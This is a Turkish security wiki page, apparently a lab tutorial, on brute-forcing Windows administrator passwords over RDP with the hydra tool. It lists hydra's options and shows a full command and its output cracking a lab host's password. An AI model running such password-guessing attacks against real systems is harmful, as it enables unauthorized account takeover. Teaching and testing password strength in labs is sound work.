Windows Hesaplarını RDP Üzerinden Bruteforce ile Elegeçirme

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Windows işletim sistemleri üzerinde yerelde oturum açılarak yapılabilen her şey uzak masaüstü bağlantısı kurularak da yapabilir. Uzak masaüstü bağlantısı için gerekli olan doğrulama bilgileri yerelde oturum açarken kullanılan bilgiler ile aynıdır. Basit seçilmiş oturum bilgileri saldırganlar tarafından istismar edilerek hedef sisteme giriş yapılabilir.

Araç:

  • hydra

Lab Senaryosu:

Saldırı aracı olarak hydra kullanılacaktır. Hydra aracının özet olarak kullanım şekli aşağıda verilmiştir.

Kullanıcı adı bilinen bir sistemde denenecek bir parola için kullanımı:

hydra –l kullanıcıAdı –p kullanıcıParolası protokol://hedefIPAdresi

En sık kullanılan hydra parametreleri:

-l: parametresi ile bilinen bir kullanıcı adı denenmesi için verilir.
-L: parametresi ile içerisinde kullanıcı listesi bulunan dosya referans gösterilir.
-p: parametresi ile bilinen bir parola değeri denemesi için verilir.
-P: parametresi ile içerisinde parola listesi bulunduran dosyanın referans gösterilir.
-C: parametresi kullanıcı Adı/parola değerlerini arada “:” bulunacak şekilde barındıran bir dosyanın referans verilmesi için kullanılır.
-M: parametresi saldırı için kullanılacak IP adreslerini barındıran dosyanın referans verilmesi için kullanılır.
-t: hedef sisteme aynı anda kaç isteğin gönderileceğini belirleyen parametredir. (varsayılan değer:16)

Bu uygulamada hedef sistemin IP adresi 192.168.20.108'dir. Hedef sistemde RDP oturum bilgilerini ele geçirmek için kullanılacak kullanıcı adı Administrator’dür.

Bu uygulama için hydra kullanımı ve çıktısı aşağıda verilmiştir;

root@kali:~/Desktop# hydra -l administrator -P wordlist.txt rdp://192.168.20.108
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-02-03 07:25:06
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[DATA] 16 tasks, 1 server, 101 login tries (l:1/p:101), ~6 tries per task
[DATA] attacking service rdp on port 3389
[ERROR] Child with pid 3629 terminating, can not connect
[ERROR] Child with pid 3630 terminating, can not connect
[ERROR] Child with pid 3628 terminating, can not connect
[ERROR] Child with pid 3631 terminating, can not connect
[3389][rdp] host: 192.168.20.108   login: administrator   password: 123
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-02-03 07:25:46

Buradaki parametrelerden;

-l: kullanıcı adını
-P: parolaların bulunduğu dosyayı 

rdp://192.168.20.108: Hedef sisteme RDP protokolü üzerinden denemeler yapılacağını göstermektedir.